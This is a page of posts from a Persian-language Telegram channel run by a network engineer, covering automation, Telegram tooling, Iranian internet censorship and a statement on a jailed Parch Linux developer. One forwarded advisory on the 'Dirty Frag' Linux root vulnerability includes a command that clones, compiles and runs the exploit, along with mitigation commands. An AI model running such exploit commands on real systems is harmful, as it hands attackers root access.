TGViewer
Channel Public Channel
مگاهرتز

مگاهرتز

@mohammadzarchi

Created: 1399/11/22 (2021/02/10)
Writer, Content Researcher: @mhzarchi
Subscribers
1.17K
Photos
207
Videos
11
Links
188

Showing posts older than #482 · Back to latest

Older Posts 20 shown
Post #480 790
برای من پاک کردن و ترک اینستاگرام مثل رهایی از سرطان بود، به محض اولین روز گذشت، ذهنم اینقدر سبک شده بود که انگار تمام اون لحظه‌‌های تصویری به جسم حجم دار تبدیل شده بودن و تو سرم سنگینی میکردن!

نمیخوام تصمیم شخصیمو در کلمات زیبا بهتون قالب کنم، فقط میخوام توجهتون رو به این رویداد تلخ جلب کنم، اونم اینکه اگر دیگه حوصله خوندن یک صفحه کتاب یا هر متون بزرگ‌تر از یک حدی، تماشای مستندات علمی و گفت‌وگوهای طولانی مدت در قالب روایت گری یا حتی گوش دادن به پادکست رو ندارید، یک جریانی در درونتون رشد کرده که خبر خوب اینه قابل نابودیه!

ویدیوهای کوتاه، فقط روی سطح آب شناورتون میکنه، شاید لذت میبرید از دونستن خبرهای جدید، تماشای بخش‌های جالب فیلم، گوش دادن به بخشی از موسیقی که احتمالا بوسیله آنالیزوها از پلت‌فرم‌های مختلف بر اساس کامنت‌های زیاد یک ترک جدا شدن، اطلاعات عمومی‌های یک دقیقه‌ای و ... اما نه کل داستان این نیست.

در واقع یکم عمیق‌تره، شما در واقع حوصله خوندن کتاب و مقاله، تماشای فیلم، گوش دادن به آلبوم‌های موسیقی، فرصت گفت‌وگو با نزدیکان، پیشرفت تو حوزه کاری رو کاملا از دست دادید و فقط بخش بزرگی از وقت رو دادید و در نهایت چیزی بدست آوردید که اگر رفرنس بخواید بدون خنده و خیلی جدی میگید تو یک کلیپ دیدم، در صورتی که چنین حرفی در یک بازه از زندگی خودتون مسخره بود، حرفی نیست، به فکر وقت و ذهنت باش رفیق 🍿

@MohammadZarchi 🛰
Post #478 625
با Netmiko یک سری کاراهای روتین رو برای خودم اتومیشن کردم، امروز نشستم متد SwitchConnect رو یکم بهینه کردم و به جای اینکه هر دفعه برای هر کدوم از کارهام به سوییچ یکبار SSH بزنه و مجدد برای کار جدید یک سشن جدید باز کنه، بیاد همون سشن ابتدایی رو در جایی ذخیره کنه و متد دیگه‌ای اگر قصد SSH زدن داشت بیاد ببینه اون سشن هنوز زندست یا نه، اگر زنده بود که استفاده اگر نبود اقدام به ساخت سشن جدید کنه (خب چرا اول اینکارو نکردی؟ چون سشن باز نگه‌داشتن یک سری خطرات برای شبکه داره و تیم SOC باید تایید بده که این نوع فرآیندها انجام بشه)

معماری پروژه یکم پیچیدست و فرآیندهای گوناگونی داره انجام میشه، اما در نهایت خروجی که قبلا برای فرایندی 173 ثانیه بطول می‌انجامید، به 28 ثانیه کاهش داده شد.

از طرفی یک استانداردی برای مغزم تعریف کردم اینجور مواقع که فقط بهم اجازه میده برم تو بعد بهینه‌سازی الگوریتم و ساختار شکنی نکنم و خب اکثر مواقع این کار نتیجش قشنگ میشه مخصوصا این مورد که با یک دیکشنری کار دراومد 🍿

@MohammadZarchi 🛰
Post #477 854

Forwarded from ذهن زیبا - A beautiful Mind

عرفان عربی، فعال #نرم‌افزار_آزاد و از توسعه‌دهندگان پارچ‌لینوکس، برای تحمل مجازات حبس به زندان رفت.
به امید آزادیش.

@haghiri75_blog
Post #473 5.98K
تو شبکه، Round Robin (RR) یک الگوریتم زمان‌بندی (Scheduling) عادلانست که برای صف‌بندی در روترها استفاده میشه (اصلاح). البته بعضی لودبالانسرها هم برای توزیع درخواست‌ها از همین الگوریتم استفاده می‌کنن.

موضوع این پست دقیقا تو نونوایی یادم اومد و گفتم بعد خرید حتما محتواشو داخل کانال قرار بدم، چرا نونوایی؟ چون اگر RR تو نونوایی پیاده‌سازی بشه تو وقت مشتری‌ها صرفه‌جویی میشه، چجوری؟ فکر کنید ۵ تا مشتری میاد داخل نونوایی، ۳ نفر ۲ نون میخوان، ۱ نفر ۱ نون، ۱ نفر ۱۰ تا، شانسم نداریم اون ۱۰ نونیه میوفته جلو، باید دوساعت واستی، حالا اگر نونوا بگه آقا من از نفر اول تا آخرتون نفری ۱ نون میدم و دوباره اینکارو می‌کنم ودوباره و دوباره و دوباره ..

اون یکی که ۱ نون میخواسته مرحله اول میره، اون ۳ نفری هم که ۲ نون میخواستن هر ۳ نفر در مرحله ۲ میرن، میمونه ۱۰ تاییه، اینجوری مدت زمان انتظار تقسیم بر افراد شده، عمیق بشی عادلانه نیست چون به هرحال داری برای نون ۴ نفر دیگم وایمیستی ولی نزدیک‌ترین حالت به عادلانه بودن فعلا اینه، خلاصه که RR اینه و میتونه در ابعاد دیگه زندگی هم استفاده بشه،امیدوارم درک کرده باشید 🍿

@MohammadZarchi 🛰
Post #472 796

Forwarded from وب آموز (m J)

⭕️ دامنه t[.]me تلگرام به دلیل پیگیری OFAC برای برخورد با شبکه وی پی ان First VPN Service که به شبکه باج افزار روی تلگرام سرویس میداد، توسط رگولاتوری از دسترس خارج شد. این شبکه وی پی ان با مخفی کردن هویت به حداقل 25 باج افزار سرویس میداده!
https://x.com/jorjandii/status/2076915989703238055
🆔 @Webamoozir
Post #471 4.3K
یادمه قبلا #تلگرام رو اسم و بایو اکانت‌، کانال، گروه و بات‌ حساس بود، یعنی اگر کلمه Telegram رو داخل نام یا بایو قرار میدادی بهت اخطار میداد، من یک بات ساختم که بخشی از پروفایلش لوگوی تلگرام بود بلافاصله از حساب خارجم کرد و گفت مجدد لاگین کن، بات هم حذف کرد، دوباره ساختم و همون عکس رو گذاشتم همین اتفاق افتاد، خلاصه رو پروفایل هم حساس شده، مراقب باشید، منم شانس آوردم دیلیتم نکرد

@MohammadZarchi 🛰
Post #470 1.3K
مگاهرتز این پراکندگی پیام‌های ارسالی من و برادرمه، برام جالب و باحاله، از طرفی برای هر فردی که اسکاترشو میفرستم جذابه، یک باگی داشت اونم اینکه افراد عادی توانایی استفاده ازش رو نداشتن، باید حتما از API تلگرام استفاده می‌کردند که گرفتن اونم زیاد داستان داره! تصمیم…
اپ Telyzer، نسخه: vC38-2607

توضیحات:
- برنامه لاگینش ساخته شده و سشن نگه میداره.
- قابلیت ورود یکبارمصرف و ورود با مدت دلخواه اوکی شده.
- هنوز ویژگی روش لحاظ نشده و فقط لاگینه، به زودی فیچراش دیپلوی میشه.
- سعی کنید فایل سشن تولید شده بوسیله برنامه رو دست نزنید، به محض استفاده در ماشینی دیگر و تشخیص تلگرام جهت امنیت حسابتون دیلیت اکانت میشین.
- توصیم اینه تا نسخه نهاییش باهاش کار نکنید مگر اینکه بخواین تو توسعش کمک کنید!
- یکم درگیرم اگر می‌بینید جایی سوتی دادم یا بد کد زدم قربونت دستتون یک pr روش بزنید.

GitHub: mzarchi/telyzer

@MohammadZarchi 🛰
Post #469 1.14K
فیلتر تلگرام رو اینترنت ثابت برداشته شده؟ 👀
Post #468 1.18K

Forwarded from Kamandlou

دامنه ویکی‌تجربه رو ابرناک تونسته بگیره، هنوز مشخص نیست چجوری، ولی احتمالا بعد از انقضا توسط ابرناک خریداری/تمدید/تملک شده.

هنوز بچه‌های ویکی‌تجربه واکنشی نشون ندادن و کسی ازشون خبر نداره.

امیدوارم براشون مشکلی پیش نیومده باشه.

@Kamandlou
Post #467 1.4K
مگاهرتز تصمیم گرفتم یک کلاینت آنالیز متن‌باز بسازم
خب تصمیم گرفتم اسمشو بزارم #Telyzer (Telegram Analyzer) یک معماری ذهنی هم برای اپ ساختم که استوری کردم اینجا (@mhzarchi) در روزهای آینده نسخه اولیشو میدم بیرون 🎰

@MohammadZarchi 🛰
Post #466 1.27K
این پراکندگی پیام‌های ارسالی من و برادرمه، برام جالب و باحاله، از طرفی برای هر فردی که اسکاترشو میفرستم جذابه، یک باگی داشت اونم اینکه افراد عادی توانایی استفاده ازش رو نداشتن، باید حتما از API تلگرام استفاده می‌کردند که گرفتن اونم زیاد داستان داره!

تصمیم گرفتم یک کلاینت آنالیز متن‌باز بسازم و در اختیار افراد بزارم که فقط با یک لاگین ساده این آنالیزها رو انجام بدن، چندتا چالش دارم اول اینکه تلگرام گفته کلاینت‌هام باید سیستم تبلیغاتی منو استفاده کنند و خب من نمیدونم بتونم متقاعدشون کنم که ابزار رایگان باید استثنا باشه یا نه، دوم سشن کاربره، اگر کسی ابزاری بسازه که اونو برای خودش آپلود کنه یکم مشکل‌ساز میشه نه بخاطر اینکه میتونه به دیتای کاربر دسترسی داشته باشه بلکه بخاطر اینه که اگر سشن کاربری دزدیده بشه و در یک سیستم‌عامل و IP و ... دیگه استفاده بشه، کاربر قربانی دیلیت اکانت میشه؛ فعلا هیچ ایده‌ای ندارم، اگر کسی کار مشابه کرده به کمکم بشتابه 😔

@MohammadZarchi 🛰
Post #465 1.19K
این گزاره من اثبات ذهنیمه، ممکنه در مشاغل و فعالیت‌های گوناگون نقض بشه، ولی عمیقا معتقدم کسانی که ایده‌ای ندارند (با فرض ایده‌پرداز بودن ذهنشون) در واقع اشرافی به عملکرد سیستم ندارن و صرفا یک استفاده کننده ساده‌اند، اگر خوراک سیستم فعالیت‌ افراد عمل‌گرای ایده‌پرداز نشن، در بهترین حالت از یکنواختی زندگی نابود میشن!

@MohammadZarchi 🛰
Post #464 1.11K

Forwarded from CleverDevs (Mammad)

یکی اومده با Claude Fable یه برنامه باحال نوشته که میاد پکت های شبکه رو به صورت ماشین نشون میده که توی اتوبان در حال حرکتن

و هر پکتی یه ماشین مخصوص مثلا پکت های ssh تاکسین یا وقتی پینگ میگیرید ماشین پلیس رد میشه


#Network | BijanBowen (@bijanbowen)
@CleverDevs - @CleverDevsGp
Post #463 1.44K
حقارت آمیز ترین حرکتی که در عصر تکنولوژی توسط حکومت وقت بر سر مردنش اومد، خرید گیگی #اینترنت آزاد بود!

@MohammadZarchi 🛰
Post #462 1.27K

Forwarded from کانال اطلاع‌رسانی توزیع پارچ

بیانیهٔ اعضای تیم پارچ لینوکس درباره محکومیت ناعادلانه عرفان عربی

سه‌شنبه، ۲۲ اردیبهشت ۱۴۰۵

با دلی سنگین و خاطری آزرده، آگاهی یافتیم که برای دوست و همکار عزیزمان «عرفان عربی»، دانشجوی ۲۰ سالهٔ مهندسی کامپیوتر و از مشارکت‌کنندگان در پروژه مردم‌نهاد و آزاد «پارچ لینوکس»، حکم تحمل ۵ سال زندان صادر شده است.

پس از حضور یافتن او در دادگاه بیرجند، حکم پیش‌گفته نه به صورت کتبی و با رعایت تشریفات قانونی و اداری، بلکه به صورت شفاهی صادر شده و به اطلاع او رسیده است.

ما «عرفان» را می‌شناسیم! او فردی است که تمام وقت و انرژی‌اش را صادقانه صرف مشارکت در یک پروژهٔ آزاد و متن‌باز کرده بود. اتهامات امنیتی که به او نسبت داده شده بی‌اساس است و هیچ پیوندی با فعالیت‌های فنی و صادقانهٔ او ندارد. ما تیم پارچ لینوکس باور داریم که «عرفان» بی‌گناه است.

علاوه بر این، گزارش‌ها حاکی از آن است که عرفان در طول این فرآیند به وکیل دسترسی مناسبی نداشته است. محاکمه‌ای که در آن حق دفاع به‌درستی تأمین نشده باشد، نمی‌تواند مبنایی برای صدور هیچ حکمی باشد. از این رو خواستار لغو کامل این حکم هستیم.

پروژهٔ پارچ لینوکس از روز نخست مبتنی بر ایدهٔ «هواداری از آزادی نرم‌افزار» آغاز به‌کار کرده است. با این آرمان که فناوریِ آزاد باید در خدمت همهٔ مردم باشد؛ بی‌توجه به این‌که چه اندیشه‌ای دارند یا کجا ایستاده‌اند. ما همواره کوشیده‌ایم بسترسازی کنیم تا هرکس بتواند در آرامش و به دور از هیاهو، در این پروژه مشارکت کند. هدف از انتشار این بیانیه، یک موضع‌گیری سیاسی نیست؛ بلکه اقدامی قاطع در راستای پاس‌داشت حقوق شهروندی و آزادی‌های بنیادین دوست و همکار عزیزمان «عرفان عربی» است.

ما بر این باوریم که دفاع از «اینترنت آزاد» و «مشارکت در پروژه‌های آزاد و مردم‌نهاد» فعالیت‌هایی هستند که باید بتوان آزادانه و بدون هراس دنبالشان کرد. توسعه‌دهندگانِ این سرزمین، شایستهٔ آن هستند که در فضایی امن کار کنند و بدانند که علاقه‌شان به فناوری، برایشان دردسر و تبدیل به یک بازی امنیتیِ نامربوط نمی‌شود.

ایستادن ما، برای عرفان و خانواده‌اش است. برای همه فرزندان این مرز و بوم که امیدواریم هرچه زودتر بتوانند به شغل، تحصیل و زندگی‌هایشان باز گردند و آن نیروی جوانی و شوقی که همواره در ایشان می‌دیدیم را بدون هراس از بازداشت شدن، دوباره صرف ساختن چیزی کنند که به آن باور دارند.

تیم پارچ لینوکس،
پاینده ایران

@ParchLinux
Post #461 876

Forwarded from gooyban🦆

بازهم آسیب‌پذیری تمام لینوکس‌ها از ۲۰۱۷: Dirty Frag

آسیب‌پذیری تازه‌ای در ادامه‌ی Dirty Pipe و Copy Fail پیدا شده، که با ترکیب دو باگ امنیتی (xfrm-ESP و RxRPC در Page Cache) در بسیاری از توزیع‌ها می‌تونه دسترسی root بگیره.

می‌تونید روی سیستم خودتون هم امتحانش کنید:
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

پس از اینکه انجامش دادید، Page Cache شما آلوده شده با اجرای دستور:
echo 3 > /proc/sys/vm/drop_caches

یا ری‌استارت کردن سیستم به حالت پیش برگردونیدش.

راهکار:
تا پچ امنیتی برای توزیعتون بیاد می‌تونید با این دستور ماژولهایی که این آسیب‌پذیری در اونها وجود داره را غیرفعال کنید و Page cache را پاک کنید:

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"


روی این سیستم‌ها تا الان تست شده و آسیب‌پذیر بودند:
Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64


اگه شبیه CopyFail به نظر میاد خودشون گفتن که:
ایده شروع این تحقیق از آسیب‌پذیری Copy Fail گرفته شده. به‌طور مشخص، بخش xfrm-ESP در زنجیره آسیب‌پذیری Dirty Frag از همان نقطه ضعف مشابه Copy Fail استفاده می‌کند. اما تفاوت مهم این است که این آسیب‌پذیری مستقل از وجود ماژول algif_aead فعال می‌شود.

به عبارت دیگر، حتی اگر روی سیستم راهکار شناخته‌شده مقابله با Copy Fail (مثل غیرفعال کردن algif_aead) اعمال شده باشد، باز هم لینوکس شما در برابر Dirty Frag آسیب‌پذیر باقی می‌ماند.


⌨️ توضیحات بیشتر در گیت‌هاب

تمام این اتفاق‌ها داره در زمانی میوفته که اینترنت ایران همچنان قطعه، سیستم‌ها به روز نشدند، با خبر شدن از این باگ‌ها و برطرف کردنشون به مراتب سخت‌تر خواهد بود.

✈️ به این لیست (از کانال سهراب) Dirty Frag را هم اضافه کنید.


🎮 @gooyban
Post #460 1.09K
‏به اشتباه جا افتاده که میگن حاکمیت از اقتصاد دیجیتال چیزی نمیفهمه، برای همین ‎#اینترنت رو قطع کرده؛ نه عزیزانم، اتفاقا می‌فهمه و میدونه میتونه ازین طریق درآمدزایی کنه و زیاده‌خواهی کنه در سهمش، اگر غیر این بود ما همه کلا قطع بودیم، نه اینکه طبقه بندی بشیم

@MohammadZarchi 🛰
Older posts →
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →